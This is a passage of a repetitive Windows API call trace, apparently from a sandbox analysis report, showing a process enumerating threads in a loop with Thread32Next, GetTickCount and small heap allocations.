0x1138d13 [0212.020] GetCurrentThreadId () returned 0x1cc [0212.020] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.020] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.020] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.021] GetTickCount () returned 0x1138d13 [0212.021] GetCurrentThreadId () returned 0x1cc [0212.021] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.021] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.021] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.022] GetTickCount () returned 0x1138d13 [0212.022] GetCurrentThreadId () returned 0x1cc [0212.022] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.022] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.022] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.023] GetTickCount () returned 0x1138d23 [0212.023] GetCurrentThreadId () returned 0x1cc [0212.023] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.023] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.023] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.024] GetTickCount () returned 0x1138d23 [0212.024] GetCurrentThreadId () returned 0x1cc [0212.024] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.024] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.024] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.025] GetTickCount () returned 0x1138d23 [0212.025] GetCurrentThreadId () returned 0x1cc [0212.025] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.025] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.025] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.026] GetTickCount () returned 0x1138d23 [0212.026] GetCurrentThreadId () returned 0x1cc [0212.026] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.026] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.026] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.027] GetTickCount () returned 0x1138d23 [0212.027] GetCurrentThreadId () returned 0x1cc [0212.027] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.027] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.027] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.028] GetTickCount () returned 0x1138d23 [0212.028] GetCurrentThreadId () returned 0x1cc [0212.028] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.028] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.028] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.029] GetTickCount () returned 0x1138d23 [0212.029] GetCurrentThreadId () returned 0x1cc [0212.029] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.029] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.029] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.030] GetTickCount () returned 0x1138d23 [0212.030] GetCurrentThreadId () returned 0x1cc [0212.030] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.030] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.030] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.031] GetTickCount () returned 0x1138d23 [0212.031] GetCurrentThreadId () returned 0x1cc [0212.031] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.031] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.031] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.032] GetTickCount () returned 0x1138d23 [0212.032] GetCurrentThreadId () returned 0x1cc [0212.032] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.032] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.032] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.033] GetTickCount () returned 0x1138d23 [0212.033] GetCurrentThreadId () returned 0x1cc [0212.033] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.033] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.033] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.034] GetTickCount () returned 0x1138d23 [0212.034] GetCurrentThreadId () returned 0x1cc [0212.034] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.034] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.034] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.035] GetTickCount () returned 0x1138d23 [0212.035] GetCurrentThreadId () returned 0x1cc [0212.035] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.035] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.035] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.036] GetTickCount () returned 0x1138d23 [0212.036] GetCurrentThreadId () returned 0x1cc [0212.036] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.036] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.036] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.037] GetTickCount () returned 0x1138d23 [0212.037] GetCurrentThreadId () returned 0x1cc [0212.037] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.037] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.037] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.039] GetTickCount () returned 0x1138d33 [0212.039] GetCurrentThreadId () returned 0x1cc [0212.039] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.039] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.039] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.040] GetTickCount () returned 0x1138d33 [0212.040] GetCurrentThreadId () returned 0x1cc [0212.040] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.040] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.040] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.041] GetTickCount () returned 0x1138d33 [0212.041] GetCurrentThreadId () returned 0x1cc [0212.041] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.041] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.041] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.042] GetTickCount () returned 0x1138d33 [0212.042] GetCurrentThreadId () returned 0x1cc [0212.042] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.042] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.042] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.043] GetTickCount () returned 0x1138d33 [0212.043] GetCurrentThreadId () returned 0x1cc [0212.043] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.043] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.043] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.044] GetTickCount () returned 0x1138d33 [0212.044] GetCurrentThreadId () returned 0x1cc [0212.044] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.044] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.044] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.045] GetTickCount () returned 0x1138d33 [0212.045] GetCurrentThreadId () returned 0x1cc [0212.045] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.045] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.045] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.046] GetTickCount () returned 0x1138d33 [0212.046] GetCurrentThreadId () returned 0x1cc [0212.046] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.046] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.046] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.047] GetTickCount () returned 0x1138d33 [0212.047] GetCurrentThreadId () returned 0x1cc [0212.047] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.047] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.047] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.048] GetTickCount () returned 0x1138d33 [0212.048] GetCurrentThreadId () returned 0x1cc [0212.048] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.048] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.048] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.049] GetTickCount () returned 0x1138d33 [0212.049] GetCurrentThreadId () returned 0x1cc [0212.049] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.049] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.049] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.050] GetTickCount () returned 0x1138d33 [0212.050] GetCurrentThreadId () returned 0x1cc [0212.050] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.050] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.050] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.051] GetTickCount () returned 0x1138d33 [0212.051] GetCurrentThreadId () returned 0x1cc [0212.051] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.051] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.051] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.052] GetTickCount () returned 0x1138d33 [0212.052] GetCurrentThreadId () returned 0x1cc [0212.052] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.052] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.052] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.053] GetTickCount () returned 0x1138d33 [0212.053] GetCurrentThreadId () returned 0x1cc [0212.053] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.053] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.053] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.054] GetTickCount () returned 0x1138d42 [0212.054] GetCurrentThreadId () returned 0x1cc [0212.054] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.054] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.054] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.055] GetTickCount () returned 0x1138d42 [0212.055] GetCurrentThreadId () returned 0x1cc [0212.055] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.055] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.055] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.056] GetTickCount () returned 0x1138d42 [0212.056] GetCurrentThreadId () returned 0x1cc [0212.056] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.056] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.056] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.057] GetTickCount () returned 0x1138d42 [0212.057] GetCurrentThreadId () returned 0x1cc [0212.057] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.057] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.057] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.058] GetTickCount () returned 0x1138d42 [0212.058] GetCurrentThreadId () returned 0x1cc [0212.058] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.058] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.058] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.059] GetTickCount () returned 0x1138d42 [0212.059] GetCurrentThreadId () returned 0x1cc [0212.059] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.059] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.059] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.060] GetTickCount () returned 0x1138d42 [0212.060] GetCurrentThreadId () returned 0x1cc [0212.060] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.060] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.060] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.061] GetTickCount () returned 0x1138d42 [0212.061] GetCurrentThreadId () returned 0x1cc [0212.061] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.061] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.061] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.062] GetTickCount () returned 0x1138d42 [0212.062] GetCurrentThreadId () returned 0x1cc [0212.062] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.062] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.062] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.063] GetTickCount () returned 0x1138d42 [0212.063] GetCurrentThreadId () returned 0x1cc [0212.063] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.063] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.063] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.064] GetTickCount () returned 0x1138d42 [0212.064] GetCurrentThreadId () returned 0x1cc [0212.064] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.064] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.064] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.065] GetTickCount () returned 0x1138d42 [0212.065] GetCurrentThreadId () returned 0x1cc [0212.065] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.065] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.066] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.066] GetTickCount () returned 0x1138d42 [0212.066] GetCurrentThreadId () returned 0x1cc [0212.066] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.066] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.067] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.067] GetTickCount () returned 0x1138d42 [0212.067] GetCurrentThreadId () returned 0x1cc [0212.067] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.067] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.068] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.068] GetTickCount () returned 0x1138d42 [0212.068] GetCurrentThreadId () returned 0x1cc [0212.068] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.069] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.069] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.069] GetTickCount () returned 0x1138d52 [0212.069] GetCurrentThreadId () returned 0x1cc [0212.070] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.070] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.070] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.070] GetTickCount () returned 0x1138d52 [0212.071] GetCurrentThreadId () returned 0x1cc [0212.071] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.071] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.071] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.071] GetTickCount () returned 0x1138d52 [0212.072] GetCurrentThreadId () returned 0x1cc [0212.072] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.072] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.072] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.073] GetTickCount () returned 0x1138d52 [0212.073] GetCurrentThreadId () returned 0x1cc [0212.073] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.073] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.073] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.074] GetTickCount () returned 0x1138d52 [0212.074] GetCurrentThreadId () returned 0x1cc [0212.074] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.074] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.074] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.075] GetTickCount () returned 0x1138d52 [0212.075] GetCurrentThreadId () returned 0x1cc [0212.075] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.075] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.075] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.076] GetTickCount () returned 0x1138d52 [0212.076] GetCurrentThreadId () returned 0x1cc [0212.076] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.076] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.076] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.077] GetTickCount () returned 0x1138d52 [0212.077] GetCurrentThreadId () returned 0x1cc [0212.077] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.077] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.077] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.078] GetTickCount () returned 0x1138d52 [0212.078] GetCurrentThreadId () returned 0x1cc [0212.078] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.078] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.078] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.079] GetTickCount () returned 0x1138d52 [0212.079] GetCurrentThreadId () returned 0x1cc [0212.079] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.079] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.079] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.080] GetTickCount () returned 0x1138d52 [0212.080] GetCurrentThreadId () returned 0x1cc [0212.080] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.080] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.080] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.081] GetTickCount () returned 0x1138d52 [0212.081] GetCurrentThreadId () returned 0x1cc [0212.081] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.081] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.081] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.082] GetTickCount () returned 0x1138d52 [0212.082] GetCurrentThreadId () returned 0x1cc [0212.082] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.082] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.082] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.083] GetTickCount () returned 0x1138d52 [0212.083] GetCurrentThreadId () returned 0x1cc [0212.083] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.083] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.083] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.084] GetTickCount () returned 0x1138d52 [0212.084] GetCurrentThreadId () returned 0x1cc [0212.084] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.084] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.084] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.085] GetTickCount () returned 0x1138d61 [0212.085] GetCurrentThreadId () returned 0x1cc [0212.085] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.085] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.085] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.086] GetTickCount () returned 0x1138d61 [0212.086] GetCurrentThreadId () returned 0x1cc [0212.086] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.086] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.086] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.087] GetTickCount () returned 0x1138d61 [0212.087] GetCurrentThreadId () returned 0x1cc [0212.087] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.087] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.087] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.088] GetTickCount () returned 0x1138d61 [0212.088] GetCurrentThreadId () returned 0x1cc [0212.088] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.088] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.088] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.089] GetTickCount () returned 0x1138d61 [0212.089] GetCurrentThreadId () returned 0x1cc [0212.089] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.089] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.089] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.090] GetTickCount () returned 0x1138d61 [0212.090] GetCurrentThreadId () returned 0x1cc [0212.090] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.090] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.091] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.091] GetTickCount () returned 0x1138d61 [0212.091] GetCurrentThreadId () returned 0x1cc [0212.092] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.092] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.092] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.092] GetTickCount () returned 0x1138d61 [0212.092] GetCurrentThreadId () returned 0x1cc [0212.093] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.093] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.093] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.093] GetTickCount () returned 0x1138d61 [0212.094] GetCurrentThreadId () returned 0x1cc [0212.094] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.094] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.094] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.095] GetTickCount () returned 0x1138d61 [0212.095] GetCurrentThreadId () returned 0x1cc [0212.095] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.095] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.095] Thread32Next 